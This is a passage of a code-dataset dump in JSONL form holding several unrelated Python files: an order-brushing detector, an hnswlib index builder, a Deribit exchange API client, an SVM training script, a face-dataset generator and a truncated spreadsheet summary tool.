"flask.request", "line_number": 117, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 129, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 129, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 141, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 141, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 142, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 142, "usage_type": "name"}, {"api_name": "flask.request.headers", "line_number": 145, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 145, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 146, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 146, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 164, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 169, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 169, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 170, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 170, "usage_type": "attribute"}]} +{"seq_id": "154064509", "text": "import pandas as pd\norders = pd.read_csv('D:/order_brush_order.csv')\norders.drop('orderid', inplace=True, axis=1)\norders['hour'] = pd.to_datetime(orders['event_time'])\nimport datetime\norders = orders.sort_values(by=['shopid','hour'])\nhourref = datetime.timedelta(hours=1)\n\ncurrshop = 0\ncurrshopstart = 0\ncurrshopend = 0\ncurrd = {}\nshops = {}\n#222750\nfor row in range(222750):\n if currshop != orders.iloc[row,0]:\n currshop = orders.iloc[row,0]\n currshopstart = row\n currshopend = row\n currd = {orders.iloc[row,1] : 1}\n shops[orders.iloc[row,0]] = 0\n continue\n \n currshopend += 1\n \n cont = False\n while orders.iloc[currshopend,3] - orders.iloc[currshopstart,3] > hourref and currshopstart < currshopend:\n if currd[orders.iloc[currshopstart,1]] == 1:\n del currd[orders.iloc[currshopstart,1]]\n else:\n currd[orders.iloc[currshopstart,1]] -= 1\n currshopstart += 1\n if currshopstart == currshopend:\n currd = {orders.iloc[currshopstart,1] : 1}\n break\n \n if orders.iloc[row,1] not in currd:\n currd[orders.iloc[row,1]] = 1\n else:\n currd[orders.iloc[row,1]] += 1\n \n \n if currshopend - currshopstart + 1 >= 3 * len(currd):\n #print(orders.iloc[row,0])\n #print(currd)\n shops[orders.iloc[row,0]] = max(currd, key = currd.get)\n\nresult = [[k, v] for k,v in shops.items()]\nanswer = pd.DataFrame(result, columns =['shopid', 'userid']) \n#answer.to_csv('RetailRow.csv')\n", "sub_path": "asdf.py", "file_name": "asdf.py", "file_ext": "py", "file_size_in_byte": 1542, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pandas.read_csv", "line_number": 2, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 4, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 7, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "145729886", "text": "# Copyright (c) 2021 PaddlePaddle Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# coding=UTF-8\n\nimport numpy as np\nimport hnswlib\nfrom paddlenlp.utils.log import logger\n\n\ndef build_index(args, data_loader, model):\n\n index = hnswlib.Index(space='ip', dim=args.output_emb_size)\n\n # Initializing index\n # max_elements - the maximum number of elements (capacity). Will throw an exception if exceeded\n # during insertion of an element.\n # The capacity can be increased by saving/loading the index, see below.\n #\n # ef_construction - controls index search speed/build speed tradeoff\n #\n # M - is tightly connected with internal dimensionality of the data. Strongly affects memory consumption (~M)\n # Higher M leads to higher accuracy/run_time at fixed ef/efConstruction\n index.init_index(\n max_elements=args.hnsw_max_elements,\n ef_construction=args.hnsw_ef,\n M=args.hnsw_m)\n\n # Controlling the recall by setting ef:\n # higher ef leads to better accuracy, but slower search\n index.set_ef(args.hnsw_ef)\n\n # Set number of threads used during batch search/construction\n # By default using all available cores\n index.set_num_threads(16)\n\n logger.info(\"start build index..........\")\n\n all_embeddings = []\n\n for text_embeddings in model.get_semantic_embedding(data_loader):\n all_embeddings.append(text_embeddings.numpy())\n\n all_embeddings = np.concatenate(all_embeddings, axis=0)\n index.add_items(all_embeddings)\n\n logger.info(\"Total index number:{}\".format(index.get_current_count()))\n\n return index\n", "sub_path": "examples/semantic_indexing/ann_util.py", "file_name": "ann_util.py", "file_ext": "py", "file_size_in_byte": 2119, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "hnswlib.Index", "line_number": 24, "usage_type": "call"}, {"api_name": "paddlenlp.utils.log.logger.info", "line_number": 48, "usage_type": "call"}, {"api_name": "paddlenlp.utils.log.logger", "line_number": 48, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 55, "usage_type": "call"}, {"api_name": "paddlenlp.utils.log.logger.info", "line_number": 58, "usage_type": "call"}, {"api_name": "paddlenlp.utils.log.logger", "line_number": 58, "usage_type": "name"}]} +{"seq_id": "78616363", "text": "# -*- coding: utf-8 -*-\r\n\r\nimport time, hashlib, requests, base64, sys\r\nfrom collections import OrderedDict\r\n\r\n\r\nclass RestClient(object):\r\n def __init__(self, key=None, secret=None, url=None):\r\n self.key = key\r\n self.secret = secret\r\n self.session = requests.Session()\r\n\r\n if url:\r\n self.url = url\r\n else:\r\n self.url = \"https://www.deribit.com\"\r\n\r\n if (self.url == \"https://test.deribit.com\"):\r\n self.verify = False\r\n else:\r\n self.verify = True\r\n\r\n def request(self, action, data):\r\n response = None\r\n\r\n if action.startswith(\"/api/v1/private/\"):\r\n if self.key is None or self.secret is None:\r\n raise Exception(\"Key or secret empty\")\r\n\r\n signature = 
self.generate_signature(action, data)\r\n response = self.session.post(self.url + action, data=data, headers={'x-deribit-sig': signature},\r\n verify=self.verify)\r\n else:\r\n response = self.session.get(self.url + action, params=data, verify=self.verify)\r\n\r\n if response.status_code != 200:\r\n raise Exception(\"Wrong response code: {0}\".format(response.status_code))\r\n\r\n json = response.json()\r\n # print(\"JSON RESULT\", json)\r\n\r\n # The result set from this method does not return a \"Success\" parameter\r\n # and this check must be skipped to avoid it failing completely\r\n if not action.startswith(\"/api/v1/private/datatable\"):\r\n if not action.startswith(\"/api/v1/private/\"):\r\n if json[\"success\"] == False:\r\n raise Exception(\"Failed: \" + json[\"message\"])\r\n\r\n\r\n if \"result\" in json:\r\n return json[\"result\"]\r\n elif \"message\" in json:\r\n return json[\"message\"]\r\n elif \"data\" in json:\r\n return json[\"data\"]\r\n else:\r\n return \"Ok\"\r\n\r\n def generate_signature(self, action, data):\r\n tstamp = int(time.time() * 1000)\r\n signature_data = {\r\n '_': tstamp,\r\n '_ackey': self.key,\r\n '_acsec': self.secret,\r\n '_action': action\r\n }\r\n signature_data.update(data)\r\n sorted_signature_data = OrderedDict(sorted(signature_data.items(), key=lambda t: t[0]))\r\n\r\n def converter(data):\r\n key = data[0]\r\n value = data[1]\r\n if isinstance(value, list):\r\n return '='.join([str(key), ''.join(value)])\r\n else:\r\n return '='.join([str(key), str(value)])\r\n\r\n items = map(converter, sorted_signature_data.items())\r\n\r\n signature_string = '&'.join(items)\r\n\r\n sha256 = hashlib.sha256()\r\n sha256.update(signature_string.encode(\"utf-8\"))\r\n sig = self.key + \".\" + str(tstamp) + \".\"\r\n sig += base64.b64encode(sha256.digest()).decode(\"utf-8\")\r\n return sig\r\n\r\n def getorderbook(self, instrument):\r\n return self.request(\"/api/v1/public/getorderbook\", {'instrument': instrument})\r\n\r\n def getinstruments(self):\r\n return self.request(\"/api/v1/public/getinstruments\", {})\r\n\r\n def getcurrencies(self):\r\n return self.request(\"/api/v1/public/getcurrencies\", {})\r\n\r\n def getlasttrades(self, instrument, count=None, since=None):\r\n options = {\r\n 'instrument': instrument\r\n }\r\n\r\n if since:\r\n options['since'] = since\r\n\r\n if count:\r\n options['count'] = count\r\n\r\n return self.request(\"/api/v1/public/getlasttrades\", options)\r\n\r\n def getsummary(self, instrument):\r\n return self.request(\"/api/v1/public/getsummary\", {\"instrument\": instrument})\r\n\r\n def index(self):\r\n return self.request(\"/api/v1/public/index\", {})\r\n\r\n def stats(self):\r\n return self.request(\"/api/v1/public/stats\", {})\r\n\r\n def account(self):\r\n return self.request(\"/api/v1/private/account\", {})\r\n\r\n def buy(self, instrument, quantity, price, postOnly=None, label=None, adv=None, tif=None):\r\n\r\n options = {\r\n \"instrument\": instrument,\r\n \"quantity\": quantity,\r\n \"price\": price\r\n }\r\n\r\n if label:\r\n options[\"label\"] = label\r\n\r\n if postOnly:\r\n options[\"postOnly\"] = postOnly\r\n\r\n if adv:\r\n options[\"adv\"] = adv\r\n\r\n if tif:\r\n options[\"time_in_force\"] = tif\r\n\r\n return self.request(\"/api/v1/private/buy\", options)\r\n\r\n def sell(self, instrument, quantity, price, postOnly=None, label=None, adv=None, tif=None):\r\n options = {\r\n \"instrument\": instrument,\r\n \"quantity\": quantity,\r\n \"price\": price\r\n }\r\n\r\n if label:\r\n options[\"label\"] = 
label\r\n\r\n if postOnly:\r\n options[\"postOnly\"] = postOnly\r\n\r\n if adv:\r\n options[\"adv\"] = adv\r\n\r\n if tif:\r\n options[\"time_in_force\"] = tif\r\n\r\n return self.request(\"/api/v1/private/sell\", options)\r\n\r\n def cancel(self, orderId):\r\n options = {\r\n \"orderId\": orderId\r\n }\r\n\r\n return self.request(\"/api/v1/private/cancel\", options)\r\n\r\n def cancelall(self, typeDef=\"all\"):\r\n return self.request(\"/api/v1/private/cancelall\", {\"type\": typeDef})\r\n\r\n def edit(self, orderId, quantity, price):\r\n options = {\r\n \"orderId\": orderId,\r\n \"quantity\": quantity,\r\n \"price\": price\r\n }\r\n\r\n return self.request(\"/api/v1/private/edit\", options)\r\n\r\n def getopenorders(self, instrument=None, orderId=None):\r\n options = {}\r\n\r\n if instrument:\r\n options[\"instrument\"] = instrument\r\n if orderId:\r\n options[\"orderId\"] = orderId\r\n\r\n return self.request(\"/api/v1/private/getopenorders\", options)\r\n\r\n def positions(self):\r\n return self.request(\"/api/v1/private/positions\", {})\r\n\r\n def orderhistory(self, count=None):\r\n options = {}\r\n if count:\r\n options[\"count\"] = count\r\n\r\n return self.request(\"/api/v1/private/orderhistory\", options)\r\n\r\n def tradehistory(self, countNum=None, instrument=\"all\", startTradeId=None):\r\n options = {\r\n \"instrument\": instrument\r\n }\r\n\r\n if countNum:\r\n options[\"count\"] = countNum\r\n if startTradeId:\r\n options[\"startTradeId\"] = startTradeId\r\n\r\n return self.request(\"/api/v1/private/tradehistory\", options)\r\n\r\n # Default pulling options table but can be used to pull other data tables as well\r\n def getdatatable(self, start=0, table=\"options\", draw=1, length=10):\r\n options = {\r\n \"start\": start,\r\n \"table\": table,\r\n \"draw\": draw,\r\n \"length\": length\r\n }\r\n return self.request(\"/api/v1/private/datatable\", options)\r\n\r\n\r\n", "sub_path": "deribit_api.py", "file_name": "deribit_api.py", "file_ext": "py", "file_size_in_byte": 6915, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "requests.Session", "line_number": 11, "usage_type": "call"}, {"api_name": "time.time", "line_number": 60, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 68, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 82, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "565298200", "text": "'''\nBy adidinchuk park. 
adidinchuk@gmail.com.\nhttps://github.com/adidinchuk/tf-support-vector-machines\n'''\n\nimport data as d\nimport numpy as np\nfrom network import Network\nimport hyperparams as hp\n\n# load and parse data\ndata = d.load_data('seeds//seeds_dataset.txt')\ndata = [row[0].replace('\\t\\t', '\\t') for row in data]\ndata = [row.split('\\t') for row in data]\n\n# extract desired features and targets\ninputs = np.array([list(map(float, [row[6], row[4]])) for row in data])\ntargets = np.transpose(np.array([list(map(float, [1 if int(row[7]) == 1 else -1,\n 1 if int(row[7]) == 2 else -1,\n 1 if int(row[7]) == 3 else -1])) for row in data]))\n\n\n# extract desired features and targets\n#inputs = np.array([list(map(float, [row[6], row[4]])) for row in data if int(row[7]) == 3 or int(row[7]) == 2])\n#targets = np.transpose(np.array([list(map(float, [1 if int(row[7]) == 3 else -1,\n# 1 if int(row[7]) == 2 else -1])) for row in data if int(row[7]) == 3 or int(row[7]) == 2]))\n\n\n# extract number of features and number of data clusters from the data\nfeature_count = len(inputs[0])\ncluster_count = len(targets)\n\n# init the network and train\nnet = Network(feature_count, cluster_count, gamma=hp.gamma)\nnet.train(inputs, targets, lr=hp.learning_rate, batch_size=hp.batch_size,\n epochs=hp.epochs, plot=True, kernel='gaussian')\n\n# Example generating predictions for data\ntest_inx = [0, 85, 190, 10, 95, 205]\ntmp = np.transpose(targets)\nprint(tmp[test_inx])\nprint(net.predict(inputs[test_inx]))\n", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 1638, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "data.load_data", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "network.Network", "line_number": 34, "usage_type": "call"}, {"api_name": "hyperparams.gamma", "line_number": 34, "usage_type": "attribute"}, {"api_name": "hyperparams.learning_rate", "line_number": 35, "usage_type": "attribute"}, {"api_name": "hyperparams.batch_size", "line_number": 35, "usage_type": "attribute"}, {"api_name": "hyperparams.epochs", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.transpose", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "637602412", "text": "import os\nimport tqdm\nimport cv2\nimport multiprocessing\nimport torch\nimport math\nimport argparse\nimport numpy as np\nimport utils\nimport shutil\nfrom PIL import Image\n\n\nTARGET_DIR = \"data/fdf_new\"\nshutil.rmtree(TARGET_DIR)\nIMAGE_TARGET_DIR = os.path.join(TARGET_DIR, \"images\")\nos.makedirs(IMAGE_TARGET_DIR)\nBBOX_TARGET_DIR = os.path.join(TARGET_DIR, \"bounding_box\")\nos.makedirs(BBOX_TARGET_DIR)\nLANDMARK_TARGET_DIR = os.path.join(TARGET_DIR, \"landmarks\")\nos.makedirs(LANDMARK_TARGET_DIR)\n\nnp.random.seed(0)\nIMAGE_SOURCE_DIR = \"/work/haakohu/yfcc100m/images2\"\n#LANDMARKS_PATH = \"/lhome/haakohu/flickr_download/annotations_keypoints.json\"\nLANDMARKS_PATH = \"test_keypoints.json\"\n\n#BBOX_PATH = \"/lhome/haakohu/flickr_download/annotations.json\"\nBBOX_PATH = \"test_bbox.json\"\nBBOX_JSON = utils.read_json(BBOX_PATH)\nLANDMARKS_JSON = utils.read_json(LANDMARKS_PATH)\nfdf_metainfo = utils.read_json(\"fdf_metainfo.json\")\n\nMIN_BBOX_SIZE = 128\nparser = 
argparse.ArgumentParser()\nparser.add_argument(\"--max_imsize\", default=128, type=int)\nparser.add_argument(\"--min_imsize\", default=4, type=int)\nparser.add_argument(\"--simple_expand\", default=False, action=\"store_true\",\n help=\"Expands the face bounding box from the center. Can include black borders.\")\nargs = parser.parse_args()\n\n\nnum_sizes = int(math.log(args.max_imsize/args.min_imsize, 2))\nTARGET_IMSIZES = [args.min_imsize * (2**k) for k in range(1, num_sizes+1)]\n\nfor imsize in TARGET_IMSIZES:\n folder = os.path.join(IMAGE_TARGET_DIR, str(imsize))\n os.makedirs(folder)\n\n\ndef get_imnames():\n imnames1 = set(LANDMARKS_JSON.keys())\n imnames2 = set(BBOX_JSON.keys())\n image_names = list(imnames2.intersection(imnames1))\n image_names.sort()\n\n return image_names\n\n\ndef match_bbox_keypoint(bounding_boxes, keypoints):\n \"\"\"\n bounding_boxes shape: [N, 5]\n keypoints: [N persons, (X, Y, Score, ?), K Keypoints]\n \"\"\"\n if len(bounding_boxes) == 0 or len(keypoints) == 0:\n return None, None\n assert bounding_boxes.shape[1] == 5, \"Shape was : {}\".format(\n bounding_boxes.shape)\n assert keypoints.shape[1:] == (4, 7), \"Keypoint shape was: {}\".format(keypoints.shape)\n # Sort after score\n sorted_idx = np.argsort(bounding_boxes[:, 4])[::-1]\n bounding_boxes = bounding_boxes[sorted_idx]\n\n matches = []\n bounding_boxes = bounding_boxes[:, :4]\n keypoints = keypoints[:, :2]\n for bbox_idx, bbox in enumerate(bounding_boxes):\n keypoint = None\n for kp_idx, keypoint in enumerate(keypoints):\n if kp_idx in [x[1] for x in matches]:\n continue\n if utils.is_keypoint_within_bbox(*bbox, keypoint):\n matches.append((bbox_idx, kp_idx))\n break\n keypoint_idx = [x[1] for x in matches]\n bbox_idx = [x[0] for x in matches]\n return bounding_boxes[bbox_idx], keypoints[keypoint_idx]\n\n\ndef process_face(bbox, landmark, imshape, imname):\n assert bbox.shape == (4,), \"Was shape: {}\".format(bbox.shape)\n assert landmark.shape == (2, 7), \"Was shape: {}\".format(landmark.shape)\n orig_bbox = bbox.copy()\n orig_landmark = landmark.copy()\n expanded_bbox = utils.expand_bbox(bbox, imshape, args.simple_expand)\n if expanded_bbox is None:\n return None\n\n width = expanded_bbox[2] - expanded_bbox[0]\n height = expanded_bbox[3] - expanded_bbox[1]\n if width < MIN_BBOX_SIZE:\n return None\n bbox[[0, 2]] -= expanded_bbox[0]\n bbox[[1, 3]] -= expanded_bbox[1]\n assert width == height, f\"width: {width}, height: {y1-y0}\"\n bbox = bbox.astype(\"int\")\n landmark[0] -= expanded_bbox[0]\n landmark[1] -= expanded_bbox[1]\n landmark = np.array([landmark[j, i]\n for i in range(landmark.shape[1]) for j in range(2)])\n return {\n \"expanded_bbox\": expanded_bbox,\n \"face_bbox\": bbox,\n \"landmark\": landmark.flatten(),\n \"orig_bbox\": orig_bbox,\n \"orig_landmark\": orig_landmark,\n \"line_idx\": imname.split(\".\")[0]\n }\n\n\ndef process_image(imname):\n impath = os.path.join(IMAGE_SOURCE_DIR, imname)\n bounding_boxes = np.array(BBOX_JSON[imname])\n landmarks = np.array(LANDMARKS_JSON[imname][\"cls_keyps\"])\n bounding_boxes, landmarks = match_bbox_keypoint(bounding_boxes, landmarks)\n if bounding_boxes is None:\n return [], impath\n assert bounding_boxes.shape[0] == landmarks.shape[0]\n\n im = Image.open(impath)\n\n imshape = im.size\n imshape = (imshape[1], imshape[0], *imshape[2:])\n resulting_annotation = []\n for bbox, landmark in zip(bounding_boxes, landmarks):\n bbox[0] = max(0, bbox[0])\n bbox[1] = max(0, bbox[1])\n bbox[2] = min(imshape[1], bbox[2])\n bbox[3] = min(imshape[0], 
bbox[3])\n face_res = process_face(bbox.copy(), landmark, imshape, imname)\n if face_res is not None:\n resulting_annotation.append(face_res)\n return resulting_annotation, impath\n\n\ndef pool(img):\n img = img.astype(np.float32)\n img = (img[0::2, 0::2] + img[0::2, 1::2] +\n img[1::2, 0::2] + img[1::2, 1::2]) * 0.25\n img = img.astype(np.uint8)\n return img\n\n\ndef save_face(original_im, face_annotation, im_idx):\n im = utils.cut_face(original_im, face_annotation[\"expanded_bbox\"],\n args.simple_expand)\n max_imsize = TARGET_IMSIZES[-1]\n im = cv2.resize(im, (max_imsize, max_imsize), interpolation=cv2.INTER_AREA)\n\n for imsize_idx in range(len(TARGET_IMSIZES)-1, -1, -1):\n imsize = TARGET_IMSIZES[imsize_idx]\n assert im.shape == (imsize, imsize, 3)\n assert im.dtype == np.uint8\n impath = os.path.join(IMAGE_TARGET_DIR, str(imsize), f'{im_idx}.jpg')\n to_save = Image.fromarray(im)\n to_save.save(impath)\n im = pool(im)\n\n\ndef extract_and_save_faces(impath, image_annotations, batch_offset):\n original_im = np.array(Image.open(impath).convert(\"RGB\"))\n for face_idx, face_annotation in enumerate(image_annotations):\n save_face(original_im, face_annotation, face_idx + batch_offset)\n\n\ndef save_annotation(bounding_boxes, landmarks, sizes):\n normalized_bbox = bounding_boxes\n normalized_landmark = landmarks\n\n for imsize in TARGET_IMSIZES:\n bbox_to_save = normalized_bbox / sizes * imsize\n bbox_to_save = torch.from_numpy(bbox_to_save).long()\n\n assert bbox_to_save.shape == bounding_boxes.shape\n\n target_path = os.path.join(BBOX_TARGET_DIR, \"{}.torch\".format(imsize))\n torch.save(bbox_to_save, target_path)\n\n landmark_to_save = normalized_landmark / sizes * imsize\n landmark_to_save = torch.from_numpy(landmark_to_save)\n\n target_path = os.path.join(LANDMARK_TARGET_DIR,\n \"{}.torch\".format(imsize))\n torch.save(landmark_to_save, target_path)\n\n\ndef extract_annotations_and_save(image_annotations):\n bounding_boxes = []\n landmarks = []\n sizes = []\n save_metainfo(image_annotations)\n for annotations in tqdm.tqdm(image_annotations, desc=\"Saving annotations\"):\n for annotation in annotations:\n bounding_boxes.append(annotation[\"face_bbox\"])\n landmarks.append(annotation[\"landmark\"])\n x0, y0, x1, y1 = annotation[\"expanded_bbox\"]\n assert int(y1 - y0) == int(x1 - x0), \"Expected image to have equal sizes. 
Was: {}, {}\".format(x1 - x0, y1 - y0)\n sizes.append(y1 - y0)\n bounding_boxes = np.stack(bounding_boxes, axis=0)\n landmarks = np.stack(landmarks, axis=0)\n sizes = np.array(sizes).reshape(-1, 1)\n save_annotation(bounding_boxes, landmarks, sizes)\n\n\ndef save_metainfo(image_annotations):\n line_idx_to_yfccm_id = {\n item[\"yfcc100m_line_idx\"]: key\n for key, item in fdf_metainfo.items()\n }\n to_save = {\n\n }\n face_id = 0\n total_faces = sum([len(x) for x in image_annotations])\n validation_size = 50000\n start_validation = total_faces - validation_size\n\n for image_annotation in image_annotations:\n for face_annotation in image_annotation:\n line_idx = face_annotation[\"line_idx\"]\n yfcc100m_id = line_idx_to_yfccm_id[line_idx]\n face_metainfo = {\n key: item\n for key, item in fdf_metainfo[yfcc100m_id].items()\n }\n new_landmark = face_annotation[\"landmark\"].reshape(2, -1)\n orig_landmark = face_annotation[\"orig_landmark\"]\n assert new_landmark.shape == orig_landmark.shape, f\"new_landmark: {new_landmark.shape}, orig_landmark: {orig_landmark.shape}\"\n orig_landmark = np.rollaxis(orig_landmark, 1)\n print(orig_landmark.shape)\n face_metainfo[\"original_bounding_box\"] = face_annotation[\"orig_bbox\"].astype(int).tolist()\n face_metainfo[\"original_landmark\"] = orig_landmark.tolist()\n face_metainfo[\"bounding_box\"] = face_annotation[\"face_bbox\"].tolist()\n face_metainfo[\"landmark\"] = face_annotation[\"landmark\"].tolist()\n face_metainfo[\"yfcc100m_line_idx\"] = line_idx\n\n if face_id >= start_validation:\n face_metainfo[\"category\"] = \"validation\"\n else:\n face_metainfo[\"category\"] = \"training\"\n to_save[face_id] = face_metainfo\n face_id += 1\n\n save_path = os.path.join(TARGET_DIR, \"fdf_metainfo.json\")\n utils.write_json(to_save, save_path)\n\n\ndef main():\n image_names = get_imnames()\n impaths = []\n image_annotations = []\n with multiprocessing.Pool(1) as pool:\n jobs = []\n for imname in image_names:\n job = pool.apply_async(process_image, (imname, ))\n jobs.append(job)\n for job in tqdm.tqdm(jobs, desc=\"Pre-processing annotations.\"):\n annotation, impath = job.get()\n impaths.append(impath)\n image_annotations.append(annotation)\n extract_annotations_and_save(image_annotations)\n total_images = [len(x) for x in image_annotations]\n print(\"Total number of images:\", sum(total_images))\n batch_offset = 0\n with multiprocessing.Pool(multiprocessing.cpu_count()) as pool:\n jobs = []\n for im_idx, annotations in enumerate(image_annotations):\n impath = impaths[im_idx]\n job = pool.apply_async(\n extract_and_save_faces, (impath, annotations, batch_offset)\n )\n batch_offset += len(annotations)\n jobs.append(job)\n for job in tqdm.tqdm(jobs):\n job.get()\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "deep_privacy/dataset_tools/fdf/generate_dataset.py", "file_name": "generate_dataset.py", "file_ext": "py", "file_size_in_byte": 10533, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "shutil.rmtree", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 19, "usage_type": "call"}, {"api_name": 
"os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 23, "usage_type": "attribute"}, {"api_name": "utils.read_json", "line_number": 30, "usage_type": "call"}, {"api_name": "utils.read_json", "line_number": 31, "usage_type": "call"}, {"api_name": "utils.read_json", "line_number": 32, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 35, "usage_type": "call"}, {"api_name": "math.log", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 71, "usage_type": "call"}, {"api_name": "utils.is_keypoint_within_bbox", "line_number": 82, "usage_type": "call"}, {"api_name": "utils.expand_bbox", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path", "line_number": 122, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 124, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 130, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 130, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 147, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 150, "usage_type": "attribute"}, {"api_name": "utils.cut_face", "line_number": 155, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 158, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 158, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 163, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path", "line_number": 164, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 165, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 165, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 171, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 171, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 171, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 182, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 186, "usage_type": "call"}, {"api_name": "os.path", "line_number": 186, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 187, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 190, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 192, "usage_type": "call"}, {"api_name": "os.path", "line_number": 192, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 194, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.rollaxis", "line_number": 239, 
"usage_type": "call"}, {"api_name": "os.path.join", "line_number": 254, "usage_type": "call"}, {"api_name": "os.path", "line_number": 254, "usage_type": "attribute"}, {"api_name": "utils.write_json", "line_number": 255, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 262, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 267, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 275, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 275, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 284, "usage_type": "call"}]} +{"seq_id": "591569268", "text": "from os import listdir\n\nimport openpyxl\nfrom xlsxwriter import Workbook\n\nfrom core.abstract import SeriesSummaryRow, MovieRow\nfrom definitions import CORE_PATH\nfrom util.util import schedule_headers_map, movie_summary_headers, series_summary_headers, series_headers_map, alpha\n\nfrom enrich import imdb as IMDB\nfrom util.util import get_current_date_string\n\n\ndef get_year_from_workbook_name(wb_name):\n return int(\"\".join(x for x in wb_name if x.isdigit()))\n\n\ndef generate_summary_worksheet_from_newest_schedule():\n\n books = [f for f in listdir(CORE_PATH) if 'schedule' in f]\n\n if not books:\n print(\"No schedule files to generate summary\")\n return\n\n books.sort(key=get_year_from_workbook_name, reverse=True)\n\n print(\"Generating summary spreadsheet from : \" + books[0])\n workbook = openpyxl.load_workbook(CORE_PATH + books[0])\n\n schedule_year = get_year_from_workbook_name(books[0])\n wb = Workbook(CORE_PATH + f'movies_series_summary_{schedule_year}_{get_current_date_string()}.xlsx')\n\n movie_rows = []\n series_summary_rows = []\n series_rows 